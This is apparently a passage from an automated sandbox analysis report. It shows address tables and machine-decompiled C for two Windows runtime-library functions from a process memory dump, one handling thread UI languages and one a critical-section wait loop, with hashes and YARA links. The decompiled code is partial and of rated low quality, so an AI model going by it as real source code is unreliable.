                                                          0x00000000
                                                          0x03462a8f
                                                          0x00000000
                                                          0x034629e3
                                                          0x034629e3
                                                          0x034629e3
                                                          0x00000000
                                                          0x034629e3
                                                          0x034629dd
                                                          0x00000000
                                                          0x034629db
                                                          0x034629e6
                                                          0x034629e9
                                                          0x034629eb
                                                          0x034629ed
                                                          0x034629f3
                                                          0x034629f5
                                                          0x034629f8
                                                          0x034629fa
                                                          0x03462a97
                                                          0x03462a9a
                                                          0x03462a9d
                                                          0x03462add
                                                          0x00000000
                                                          0x03462a9f
                                                          0x03462aa2
                                                          0x03462aa5
                                                          0x03462aa8
                                                          0x03462aab
                                                          0x034a5cab
                                                          0x034a5caf
                                                          0x034a5cc5
                                                          0x034a5cda
                                                          0x034a5cdc
                                                          0x034a5cdf
                                                          0x034a5ce5
                                                          0x00000000
                                                          0x034a5ceb
                                                          0x034a5ced
                                                          0x034a5cee
                                                          0x00000000
                                                          0x034a5cee
                                                          0x034a5cb1
                                                          0x034a5cb4
                                                          0x034a5cb9
                                                          0x034a5cbb
                                                          0x00000000
                                                          0x034a5cbd
                                                          0x034a5cbd
                                                          0x00000000
                                                          0x034a5cbd
                                                          0x034a5cbb
                                                          0x03462ab1
                                                          0x03462ab1
                                                          0x03462ac4
                                                          0x03462ac6
                                                          0x03462ac6
                                                          0x00000000
                                                          0x03462ac6
                                                          0x03462aab
                                                          0x00000000
                                                          0x03462a00
                                                          0x03462a09
                                                          0x03462a0e
                                                          0x03462a21
                                                          0x03462a24
                                                          0x03462a35
                                                          0x03462a3a
                                                          0x03462a3d
                                                          0x03462a42
                                                          0x03462a59
                                                          0x03462a59
                                                          0x03462a5c
                                                          0x03462a5f
                                                          0x03462a5f
                                                          0x034629fa
                                                          0x034629f3
                                                          0x03462a64
                                                          0x03462a64
                                                          0x03462a6b
                                                          0x03462a6b
                                                          0x03462a6d
                                                          0x03462a72
                                                          0x03462a72
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PATH
                                                          • API String ID: 0-1036084923
                                                          • Opcode ID: 515f6a25991ed9af150175d7c1ec6f6665fe651573d1498d7ff439d8e49dae73
                                                          • Instruction ID: a17101438652d98f876708634f0fb5d469ec5683dc0005c2fe83b1503636d5db
                                                          • Opcode Fuzzy Hash: 515f6a25991ed9af150175d7c1ec6f6665fe651573d1498d7ff439d8e49dae73
                                                          • Instruction Fuzzy Hash: D2C194B5E00619EFCB24DF99D880BAEB7B1FF49701F08442AE411AF360D774A946CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0346FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E0346FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0344EEF0(0x3527b60);
					_t134 =  *0x3527b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x3527b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x3527b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E03446D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E034476E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E034D8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0343B150();
													}
													_t116 = E034D6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E034475CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x3528638; // 0x0
																	_t122 = L034438A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E034476E2(_t154);
																			goto L41;
																		}
																	} else {
																		E034476E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0346FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L034470F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0346FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0346FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0346FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0346FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0346FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x3527b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x3527b84 = _t75;
						_t73 = E0344EB70(_t134, 0x3527b60);
						if( *0x3527b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0344FF60( *0x3527b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                          0x0346fab0
                                                          0x0346fab2
                                                          0x0346fab3
                                                          0x0346fab4
                                                          0x0346fabc
                                                          0x0346fac0
                                                          0x0346fb14
                                                          0x0346fb17
                                                          0x0346fac2
                                                          0x0346fac8
                                                          0x0346facd
                                                          0x0346fad3
                                                          0x0346fad3
                                                          0x0346fadd
                                                          0x0346fb18
                                                          0x0346fb1b
                                                          0x0346fb1d
                                                          0x0346fb1e
                                                          0x0346fb1f
                                                          0x0346fb20
                                                          0x0346fb21
                                                          0x0346fb22
                                                          0x0346fb23
                                                          0x0346fb24
                                                          0x0346fb25
                                                          0x0346fb26
                                                          0x0346fb27
                                                          0x0346fb28
                                                          0x0346fb29
                                                          0x0346fb2a
                                                          0x0346fb2b
                                                          0x0346fb2c
                                                          0x0346fb2d
                                                          0x0346fb2e
                                                          0x0346fb2f
                                                          0x0346fb3a
                                                          0x0346fb3b
                                                          0x0346fb3e
                                                          0x0346fb41
                                                          0x0346fb44
                                                          0x0346fb47
                                                          0x0346fb4a
                                                          0x0346fb4d
                                                          0x0346fb53
                                                          0x034abdcb
                                                          0x034abdcb
                                                          0x0346fb59
                                                          0x0346fb5b
                                                          0x0346fb5b
                                                          0x0346fb5e
                                                          0x034abdd5
                                                          0x034abdd8
                                                          0x00000000
                                                          0x034abdda
                                                          0x00000000
                                                          0x034abdda
                                                          0x0346fb64
                                                          0x0346fb64
                                                          0x0346fb64
                                                          0x0346fb67
                                                          0x0346fb6e
                                                          0x0346fb70
                                                          0x0346fb72
                                                          0x00000000
                                                          0x0346fb78
                                                          0x0346fb7a
                                                          0x0346fb7a
                                                          0x0346fb7d
                                                          0x0346fb80
                                                          0x034abddf
                                                          0x034abde1
                                                          0x00000000
                                                          0x034abde3
                                                          0x00000000
                                                          0x034abde3
                                                          0x0346fb86
                                                          0x0346fb86
                                                          0x0346fb86
                                                          0x0346fb8b
                                                          0x0346fb90
                                                          0x0346fb92
                                                          0x0346fb94
                                                          0x0346fb9a
                                                          0x0346fb9b
                                                          0x0346fba1
                                                          0x034abde8
                                                          0x034abdeb
                                                          0x034abded
                                                          0x034abeb5
                                                          0x034abeb5
                                                          0x034abebb
                                                          0x034abebd
                                                          0x034abec3
                                                          0x034abed2
                                                          0x034abedd
                                                          0x034abedd
                                                          0x034abeed
                                                          0x00000000
                                                          0x034abdf3
                                                          0x034abdfe
                                                          0x034abe06
                                                          0x034abe0b
                                                          0x034abe0d
                                                          0x034abe0f
                                                          0x034abe14
                                                          0x034abe19
                                                          0x034abe20
                                                          0x034abe25
                                                          0x034abe27
                                                          0x034abe35
                                                          0x034abe39
                                                          0x034abe46
                                                          0x034abe4f
                                                          0x034abe54
                                                          0x034abe56
                                                          0x034abef8
                                                          0x034abef8
                                                          0x00000000
                                                          0x034abe5c
                                                          0x034abe5c
                                                          0x034abe60
                                                          0x00000000
                                                          0x034abe66
                                                          0x034abe66
                                                          0x034abe7f
                                                          0x034abe84
                                                          0x034abe87
                                                          0x034abe89
                                                          0x034abe8b
                                                          0x034abe99
                                                          0x034abe9d
                                                          0x034abea0
                                                          0x034abeac
                                                          0x034abeaf
                                                          0x034abeb1
                                                          0x034abeb3
                                                          0x034abeb3
                                                          0x00000000
                                                          0x034abea2
                                                          0x034abea2
                                                          0x00000000
                                                          0x034abea2
                                                          0x034abe8d
                                                          0x034abe8d
                                                          0x034abe92
                                                          0x00000000
                                                          0x034abe92
                                                          0x034abe8b
                                                          0x034abe60
                                                          0x034abe3b
                                                          0x034abe3b
                                                          0x034abe3e
                                                          0x00000000
                                                          0x034abe40
                                                          0x034abe40
                                                          0x034abe44
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034abe44
                                                          0x034abe3e
                                                          0x034abe29
                                                          0x034abe29
                                                          0x00000000
                                                          0x034abe29
                                                          0x034abe27
                                                          0x00000000
                                                          0x0346fba7
                                                          0x0346fba7
                                                          0x0346fbab
                                                          0x034abf02
                                                          0x0346fbb1
                                                          0x0346fbb1
                                                          0x0346fbb8
                                                          0x0346fbbd
                                                          0x0346fbbd
                                                          0x0346fbbf
                                                          0x0346fbbf
                                                          0x0346fbc5
                                                          0x0346fbcb
                                                          0x0346fbf8
                                                          0x0346fbf8
                                                          0x0346fbfa
                                                          0x00000000
                                                          0x0346fc00
                                                          0x0346fc00
                                                          0x0346fc03
                                                          0x00000000
                                                          0x0346fc09
                                                          0x0346fc09
                                                          0x0346fc0f
                                                          0x0346fc15
                                                          0x0346fc23
                                                          0x0346fc23
                                                          0x0346fc25
                                                          0x0346fc27
                                                          0x0346fc75
                                                          0x0346fc7c
                                                          0x0346fc84
                                                          0x00000000
                                                          0x0346fc29
                                                          0x0346fc29
                                                          0x0346fc2d
                                                          0x0346fc30
                                                          0x034abf0f
                                                          0x00000000
                                                          0x0346fc36
                                                          0x0346fc38
                                                          0x0346fc3b
                                                          0x0346fc41
                                                          0x034abf17
                                                          0x034abf19
                                                          0x034abf48
                                                          0x034abf4b
                                                          0x00000000
                                                          0x034abf1b
                                                          0x034abf22
                                                          0x034abf24
                                                          0x034abf26
                                                          0x00000000
                                                          0x034abf2c
                                                          0x034abf37
                                                          0x034abf39
                                                          0x034abf3b
                                                          0x00000000
                                                          0x034abf41
                                                          0x034abf41
                                                          0x034abf41
                                                          0x034abf41
                                                          0x034abf45
                                                          0x00000000
                                                          0x034abf45
                                                          0x034abf3b
                                                          0x034abf26
                                                          0x00000000
                                                          0x0346fc47
                                                          0x0346fc47
                                                          0x0346fc49
                                                          0x0346fcb2
                                                          0x0346fcb4
                                                          0x0346fcb6
                                                          0x0346fcdc
                                                          0x0346fcdc
                                                          0x00000000
                                                          0x0346fcb8
                                                          0x0346fcc3
                                                          0x0346fcc5
                                                          0x0346fcc7
                                                          0x00000000
                                                          0x0346fcc9
                                                          0x0346fcc9
                                                          0x0346fccd
                                                          0x00000000
                                                          0x0346fccd
                                                          0x0346fcc7
                                                          0x00000000
                                                          0x0346fc4b
                                                          0x0346fc4b
                                                          0x0346fc4e
                                                          0x0346fc4e
                                                          0x0346fc51
                                                          0x0346fc51
                                                          0x0346fc54
                                                          0x0346fc5a
                                                          0x0346fc5c
                                                          0x0346fc5f
                                                          0x0346fc61
                                                          0x0346fc63
                                                          0x0346fc65
                                                          0x0346fc67
                                                          0x0346fc6e
                                                          0x0346fc72
                                                          0x0346fc72
                                                          0x0346fc72
                                                          0x0346fc72
                                                          0x0346fc67
                                                          0x0346fc61
                                                          0x00000000
                                                          0x0346fc5a
                                                          0x0346fc49
                                                          0x0346fc41
                                                          0x0346fc30
                                                          0x0346fc27
                                                          0x0346fc03
                                                          0x0346fbcd
                                                          0x0346fbd3
                                                          0x0346fbd9
                                                          0x0346fbdc
                                                          0x0346fbde
                                                          0x0346fc99
                                                          0x0346fc9b
                                                          0x0346fc9d
                                                          0x0346fcd5
                                                          0x0346fcd5
                                                          0x0346fc89
                                                          0x0346fc89
                                                          0x00000000
                                                          0x0346fc9f
                                                          0x0346fc9f
                                                          0x0346fca3
                                                          0x00000000
                                                          0x0346fca3
                                                          0x00000000
                                                          0x0346fbe4
                                                          0x0346fbe4
                                                          0x0346fbe4
                                                          0x0346fbe4
                                                          0x0346fbe9
                                                          0x0346fbf2
                                                          0x00000000
                                                          0x0346fbf2
                                                          0x0346fbde
                                                          0x0346fbcb
                                                          0x0346fbab
                                                          0x0346fc8b
                                                          0x0346fc8b
                                                          0x0346fc8c
                                                          0x0346fb80
                                                          0x0346fb72
                                                          0x0346fb5e
                                                          0x0346fc8d
                                                          0x0346fc91
                                                          0x0346fadf
                                                          0x0346fadf
                                                          0x0346fae1
                                                          0x0346fae4
                                                          0x0346fae7
                                                          0x0346faec
                                                          0x0346faf8
                                                          0x0346fb00
                                                          0x0346fb07
                                                          0x0346fb0f
                                                          0x0346fb0f
                                                          0x0346fb07
                                                          0x00000000
                                                          0x0346faf8
                                                          0x0346fadd

                                                          Strings
                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 034ABE0F
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                          • API String ID: 0-865735534
                                                          • Opcode ID: 285bbbb4bbc8712385196e87cdc704a155241ad4b77c802ddde4c89dcd6766ac
                                                          • Instruction ID: 1867fa5a3aa19f929cbc2e64d6429a314fd1a686bcca6e36b6b9996719c0c1a2
                                                          • Opcode Fuzzy Hash: 285bbbb4bbc8712385196e87cdc704a155241ad4b77c802ddde4c89dcd6766ac
                                                          • Instruction Fuzzy Hash: 23A10131A00B058FEB25DF69D450B6BB7A4FB49710F08456FE892CF790DB30D80A8B89
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03432D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E03432D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x3525350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x3527bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E034797C0();
				}
				if( *0x35279c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x35279c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E03461624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E03457D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E034CFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03479520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0346E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0348DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x3526901;
								_push(_t109);
								_v52 = _t98;
								if( *0x3526901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03479980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E034795D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E03457D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E03457D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E034B7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E034CFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x3525350;
							if(_t109 != 0x3525350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E034CFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E034C5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                          0x03432d8a
                                                          0x03432d8a
                                                          0x03432d92
                                                          0x03432d96
                                                          0x03432d9e
                                                          0x03432da0
                                                          0x03432da3
                                                          0x03432da5
                                                          0x03432da8
                                                          0x03432dab
                                                          0x03432db2
                                                          0x0348f9aa
                                                          0x0348f9ab
                                                          0x0348f9ae
                                                          0x0348f9ae
                                                          0x03432db8
                                                          0x03432dc2
                                                          0x0348f9b9
                                                          0x0348f9be
                                                          0x0348f9bf
                                                          0x0348f9bf
                                                          0x03432dcf
                                                          0x0348f9c9
                                                          0x03432dd5
                                                          0x03432dd5
                                                          0x03432dd5
                                                          0x03432dde
                                                          0x03432de1
                                                          0x03432e70
                                                          0x03432e72
                                                          0x03432e72
                                                          0x03432de7
                                                          0x03432deb
                                                          0x03432e7c
                                                          0x03432e83
                                                          0x03432e85
                                                          0x03432e8b
                                                          0x03432e8d
                                                          0x03432e92
                                                          0x03432e92
                                                          0x03432e85
                                                          0x03432df1
                                                          0x03432df7
                                                          0x03432df9
                                                          0x03432df9
                                                          0x03432dfc
                                                          0x03432dff
                                                          0x03432e02
                                                          0x00000000
                                                          0x03432e05
                                                          0x03432e0c
                                                          0x0348f9d9
                                                          0x03432e12
                                                          0x03432e12
                                                          0x03432e12
                                                          0x03432e1a
                                                          0x0348f9e3
                                                          0x0348f9e9
                                                          0x0348f9f0
                                                          0x0348f9f6
                                                          0x0348f9f8
                                                          0x0348f9f8
                                                          0x0348f9f0
                                                          0x03432e23
                                                          0x0348fa02
                                                          0x0348fa03
                                                          0x0348fa05
                                                          0x0348fa06
                                                          0x00000000
                                                          0x03432e29
                                                          0x03432e29
                                                          0x03432e2e
                                                          0x03432e34
                                                          0x03432e3e
                                                          0x00000000
                                                          0x00000000
                                                          0x03432e44
                                                          0x03432e47
                                                          0x03432e4d
                                                          0x00000000
                                                          0x00000000
                                                          0x03432e4f
                                                          0x03432e54
                                                          0x00000000
                                                          0x00000000
                                                          0x03432e5a
                                                          0x03432e5f
                                                          0x03432e9a
                                                          0x03432ea4
                                                          0x03432ea5
                                                          0x03432ea8
                                                          0x03432eaf
                                                          0x03432eb2
                                                          0x03432eb5
                                                          0x0348fae9
                                                          0x0348faeb
                                                          0x0348faed
                                                          0x0348faef
                                                          0x0348faf7
                                                          0x0348faf8
                                                          0x0348fafd
                                                          0x0348faff
                                                          0x0348fb04
                                                          0x0348fb04
                                                          0x0348faff
                                                          0x03432ec0
                                                          0x03432ec4
                                                          0x03432ec6
                                                          0x03432ec8
                                                          0x0348fb14
                                                          0x0348fb18
                                                          0x0348fb1e
                                                          0x0348fb21
                                                          0x0348fb21
                                                          0x03432ece
                                                          0x03432ece
                                                          0x03432ece
                                                          0x03432ed7
                                                          0x03432e61
                                                          0x03432e63
                                                          0x0348fa6b
                                                          0x0348fa71
                                                          0x0348fa76
                                                          0x0348fa78
                                                          0x0348fa8a
                                                          0x0348fa7a
                                                          0x0348fa83
                                                          0x0348fa83
